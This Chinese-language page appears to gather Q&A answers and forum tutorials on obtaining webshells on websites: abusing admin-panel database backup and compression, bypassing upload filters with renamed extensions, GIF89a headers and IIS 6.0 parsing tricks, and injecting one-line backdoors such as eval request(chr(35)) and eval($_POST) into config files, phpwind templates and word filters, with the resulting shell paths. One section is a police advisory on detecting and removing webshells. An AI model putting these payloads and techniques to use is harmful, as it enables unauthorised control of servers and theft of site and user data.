webshell資料庫備份
㈠ 進入後台後備份拿webshell的問題
N種方法,第一種可能是網站後台壞了, 第二種可能是你技術不過關, 找不到路徑。
這里給你提供幾種辦法, 1。文件名/../備份
2.目錄名創建1.asp
3.文件名IIS6.0解析漏洞 1.asp;1.mdb
--------------
實在解決不了PM我好了
㈡ 請問大俠;在動力文章系統下怎麼備份資料庫的法拿webshell
前面的網站+UploadFiles\2008121223152748.asp.asa就是你的馬地址.
找不到馬說明你的馬可能被殺軟殺了,或者本來馬就有問題用不了.你應該是直接備份的大馬吧.多准備幾個大馬!!
㈢ 備份資料庫可以拿webshell是什麼意思
你上傳了一個圖片
你點了備份數據
你拿到了webshell
你就是黑客了
:)
深入點就是
你上傳了個ASP小馬
結果呢伺服器發現你是壞人
不讓你上傳
你就想辦法啊
想啊想啊
試了好多的東西
最後發現JPG格式的可以上傳
你高興死了
然後就把你的ASP馬改成JPG後輟的
你上傳上去後打開
奇怪了,咋不顯示
顯示了一個叉叉
伺服器拒絕顯示
郁悶死你了
你又想啊想啊想啊
圖片不給顯示
圖片在資料庫裡面
你上火了
直接把資料庫改成了
你的ASP後輟了
然後你拿到WEBSHELL了
-
-#
㈣ 自己網站怎麼拿WEBSHELL
一、直接上傳獲得webshell
這種對php和jsp的一些程序比較常見,MolyX BOARD就是其中一例,直接在心情圖標管理上傳.php類型,雖然沒有提示,其實已經成功了,上傳的文 件url應該是http://forums/images/smiles/下,前一陣子的聯眾游戲站和網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名,bo-blog後台可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統),因過濾上傳文件不嚴,導致用戶可以直接上傳webshell到網站任意可寫目錄中,從而拿到網站的管理員控制許可權。
二、添加修改上傳類型
現在很多的腳本程序上傳模塊不是只允許上傳合法文件類型,而大多數的系統是允許添加上傳類型,bbsxp後台可以添加asa|asP類型,ewebeditor的後台也可添加asa類型,通過修改後我們可以直接上傳asa後綴的webshell了,還有一種情況是過濾了.asp,可以添加.aspasp的文件類型來上傳獲得webshell。php系統的後台,我們可以添加.php.g1f的上傳類型,這是php的一個特性,最後的哪個只要不是已知的文件類型即可,php會將php.g1f作為.php來正常運行,從而也可成功拿到shell。LeadBbs3.14後台獲得webshell方法是:在上傳類型中增加asp ,注意,asp後面是有個空格的,然後在前台上傳ASP馬,當然也要在後面加個空格!
三、利用後台管理功能寫入webshell
上傳漏洞基本上補的也差不多了,所以我們進入後台後還可以通過修改相關文件來寫入webshell。比較的典型的有dvbbs6.0,還有leadbbs2.88等,直接在後台修改配置文件,寫入後綴是asp的文件。而LeadBbs3.14後台獲得webshell另一方法是:添加一個新的友情鏈接,在網站名稱處寫上冰狐最小馬即可,最小馬前後要隨便輸入一些字元,http:\\網站\inc\IncHtm\BoardLink.asp就是我們想要的shell。
四、利用後台管理向配置文件寫webshell
利用"""":""//"等符號構造最小馬寫入程序的配置文件,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程序等等,還有很多php程序都可以,COCOON Counter統計程序舉例,在管理郵箱處添上cnhacker at 263 dot net":eval request(chr (35))//, 在配製文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//",還有一種方法就是寫上cnhacker at 263 dot net"%><%eval request(chr(35))%><%',這樣就會形成前後對應,最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是資料庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入一句話馬"%><%execute request("l")%><%',保存頂部欄目菜單參數設置成功後,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。
五、利用後台資料庫備份及恢復獲得webshell
主要是利用後台對access資料庫的「備份資料庫」或「恢復資料庫」功能,「備份的資料庫路徑」等變數沒有過濾導致可以把任意文件後綴改 為asp,從而得到webshell,msssql版的程序就直接應用了access版的代碼,導致sql版照樣可以利用。還可以備份網站asp文件為其他後綴 如.txt文件,從而可以查看並獲得網頁源代碼,並獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候,但是有asp系統在運行,利用此方法來查看源代碼來獲得其資料庫的位置,為資料庫插馬來創造機會,動網論壇就有一個ip地址的資料庫,在後台的ip管理中可以插入最小馬然後備份成.asp文件即可。在談談突破上傳檢測的方法,很多asp程序在即使改了後綴名後也會提示文件非法,通過在.asp文件頭加上gif89a修改後綴為gif來騙過asp程序檢測達到上傳的目的,還有一種就是用記事本打開圖片文件,隨便粘貼一部分復制到asp木馬文件頭,修改gif後綴後上傳也可以突破檢測,然後備份為.asp文件,成功得到webshell。
六、利用資料庫壓縮功能
可以將數據的防下載失效從而使插入資料庫的最小馬成功運行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫上<%eval request (chr(35))%>, 提交後,在資料庫操作中壓縮資料庫,可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個webshell。
七、asp+mssql系統
這里需要提一點動網mssql版,但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片,然後記住其上傳路徑。寫一個本地提交的表單
㈤ 【網警提醒】基礎網路攻防之webshell攻擊
什麼是webshell?有什麼危害?
webshell 就是一種可以在web伺服器上執行的後台腳本或者命令執行環境。
黑客通過入侵網站上傳webshell後獲得伺服器的執行操作許可權,比如執行系統命令、竊取用戶數據、刪除web頁面、修改主頁等,其危害不言而喻。
Webshell攻擊的特點有哪些?
1
持續遠程訪問
入侵者可以利用 webshell 從而達到長期控制網站伺服器的目的。若攻擊者自行修復了漏洞,以確保沒有其他人會利用該漏洞,攻擊者可以低調的隨時控制伺服器。一些流行的 webshell 使用密碼驗證和其他技術來確保只有上傳 webshell 的攻擊者才能訪問它。
2
許可權提升
在伺服器沒有配置錯誤的情況下, webshell 將在web伺服器的用戶許可權下運行,該用戶許可權是有限的。通過使用 webshell ,攻擊者可以嘗試通過利用系統上的本地漏洞來執行許可權提升,常見的有查找敏感配置文件、通過內核漏洞提權、利用低許可權用戶目錄下可被Root許可權用戶調用的腳本提權、任務計劃等。
3
極強的隱蔽性
有些惡意網頁腳本可以嵌套在正常網頁中運行,且不容易被查殺。webshell還可以穿越伺服器防火牆,由於與被控制的伺服器或遠程主機交互的數據都是通過80埠傳遞,因此不會被防火牆攔截,在沒有記錄流量的情況下, webshell 使用post包發送,也不會被記錄在系統日誌中,只會在web日誌中記錄一些數據提交的記錄。
獲取webshell的常見方法
1
直接上傳獲得webshell
因過濾上傳文件不嚴,導致用戶可以直接上傳 webshell 到網站任意可寫目錄中,從而拿到網站的管理員控制許可權。
2
添加修改上傳類型
現在很多腳本程序上傳模塊不是只允許上傳合法文件類型,大多數的系統是允許添加上傳類型。
3
利用後台管理功能寫入webshell
進入後台後還可以通過修改相關文件來寫入webshell。
4
利用後台資料庫備份及恢復獲得
主要是利用後台對access資料庫的「備份資料庫」或「恢復資料庫」功能,「備份的資料庫路徑」等變數沒有過濾導致可以把任意文件後綴改為asp,從而得到webshell。
5
php+mysql系統
後台需要有mysql數據查詢功能,入侵者就可以利用它執行SELECT ... in TO OUTFILE查詢輸出php文件,因為所有的數據是存放在mysql里的,所以我們可以通過正常手段把我們的WebShell代碼插入mysql在利用SELECT ... in TO OUTFILE語句導出shell。
webshell網站後門的清除方法
後門的文件可以直接刪除,找到後門文件,直接刪除即可;
不能直接刪除後門文件,只能刪除文件內容中的木馬代碼進行清除。
1、文件名為index.asp 、index.php,這類為自動生成SEO類型文件,可以直接刪除,如要徹底清除後門,需找生成此文件的源文件。
2、文件內容只有一行,或很少量的代碼,此類被稱為「一句話後門」。
3、文件內容中存在password或UserPass關鍵字。
4、另外一些在上傳組件目錄或上傳目錄的文件可以直接刪除。如eWebEditor、Editor、FCKeditor、webeditor、UploadFiles、uploads等。
1、網站自身文件被插入惡意代碼
2、網站配置文件
這類插入網站自身代碼中的後門清除方法:
首先備份此文件以備改錯可恢復,查找到後門代碼的位置,一般通過查找「eval、execute、request、ExecuteGlobal」關鍵字進行定位。把確定為後門的代碼刪除後保存文件。訪問網站看是否報錯,以確認有沒有改錯。
網站如何防禦webshell攻擊?
從根本上解決動態網頁腳本的安全問題,要做到防注入、防暴庫、防COOKIES欺騙、防跨站攻擊等等,務必配置好伺服器FSO許可權。
1、建議用戶通過ftp來上傳、維護網頁,盡量不安裝上傳程序。
2、對上傳程序的調用一定要進行身份認證,並只允許信任的人使用上傳程序。
3、程序管理員的用戶名和密碼要有一定復雜性,不能過於簡單,還要注意定期更換。
4、到正規網站下載程序,要對資料庫名稱和存放路徑進行修改,資料庫名稱要有一定復雜性。
5、盡量保持程序是最新版本。
6、不要在網頁上加註後台管理程序登陸頁面的鏈接。
7、為防止程序有未知漏洞,可以在維護後刪除後台管理程序的登陸頁面,下次維護時再上傳。
8、時常備份資料庫等重要文件。
9、日常多維護,並注意空間中是否有來歷不明的asp文件。
10、盡量關閉網站搜索功能,利用外部搜索工具,以防爆出數據。
11、利用白名單上傳文件,不在白名單內的一律禁止上傳,上傳目錄許可權遵循最小許可權原則。
㈥ 如何備份資料庫拿webshell
首先後台必須得有資料庫備份這個功能,其實原理很簡單,就是通過資料庫備份這個功能向伺服器裡面寫一個腳本文件,(例如:asp,php,jsp....)而內容就是"一句話"或者是大馬.而這個寫進去的腳本文件就是你的webshell
㈦ 怎麼用MySql備份得到WebShell
九、phpwind論壇從後台到webshell的三種方式
方式1 模板法
進入後台, 風格模版設置,在隨便一行寫代碼,記住,這代碼必須頂著左邊行寫,代碼前面不可以有任何字元。
EOT;
eval($a);
print <<<EOT
而後得到一個shell為http://網站/bbs/index.php。
方始2 臟話過濾法
進入安全管理 ◇ 不良詞語過濾。新增不良詞語寫 a』]=』aa』;eval($_POST[』a』]);//
替換為那裡可以隨意寫,而後得到一個shell地址為http://網站/bbs/data/bbscache/wordsfb.php。
方式3 用戶等級管理
新建立會員組,頭銜你可以隨便寫,但是千萬不要寫單雙引號特殊符號,升級圖片號寫a』;eval($_POST[』a』]);// ,升級點數依然可以隨意寫。而後得到一個shell地址為http://網站/bbs/data/bbscache/level.php。
以上三種方式得到webshellr的密碼是a,為lanker的一句話後門服務端。
十、也可以利用網站訪問計數系統記錄來獲得webshell
最明顯的就是某私服程序內的阿江計數程序,可以通過http://網站/stat.asp?style=text&referer= 代碼內容&screenwidth=1024直接提交,即可把代碼內容直接插入到計數系統的資料庫中,而此系統默認資料庫為count#.asa,我們可以通過http://網站/count%23.asa訪問得到webshell,由於阿江計數程序過濾了%和+,將最小馬改成<SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request("1"))</SCRIPT>替換代碼內容處提交,然後用lake2的eval客戶端來提交,值得一提的是如果進到計數後台,可以清理某時某刻的數據,一旦插入asp木馬失敗,可以清理資料庫再次操作。
解決方案
由於本文涉及的代碼版本很多,所以不可能提供一個完美的解決方案。有能力者可以針對本文提到的漏洞文件進行適當修補,若漏洞文件不影響系統使用也可刪除此文件。大家如果不會修補,可以到相關官方網站下載最新補丁進行修復更新。同時也請大家能時刻關注各大安全網路發布的最新公告,若自己發現相關漏洞也可及時通知官方網站。
後記
其實,從後台得到webshell的技巧應該還有很多的,關鍵是要看大家怎麼靈活運用、觸類旁通,希望本文的方法能起到拋磚引玉的作用。各位加油吧,讓我們將伺服器控制到底
㈧ 備份資料庫可以拿webshell是什麼意思
你上傳了一個圖片
你點了備份數據
你拿到了webshell
你就是黑客了:)
深入點就是
你上傳了個ASP小馬結果呢伺服器發現你是壞人不讓你上傳
你就想辦法啊想啊想啊試了好多的東西最後發現JPG格式的可以上傳
你高興死瞭然後就把你的ASP馬改成JPG後輟的你上傳上去後打開
奇怪了,咋不顯示顯示了一個叉叉伺服器拒絕顯示郁悶死你了
你又想啊想啊想啊圖片不給顯示圖片在資料庫裡面你上火了
直接把資料庫改成了你的ASP後輟瞭然後你拿到WEBSHELL了--#
㈨ 網站後台沒有資料庫備份功能,請問高手如何完成拿到網站WEBSHELL
可以用抓包的方法實現。。。原理是用抓包工具抓取數據,得到cookie和真實路徑,然後就可以用明小子上傳小馬,得到webshell了。。
建議你先找點抓包教程看看,知道了原理,看看就都明白了。。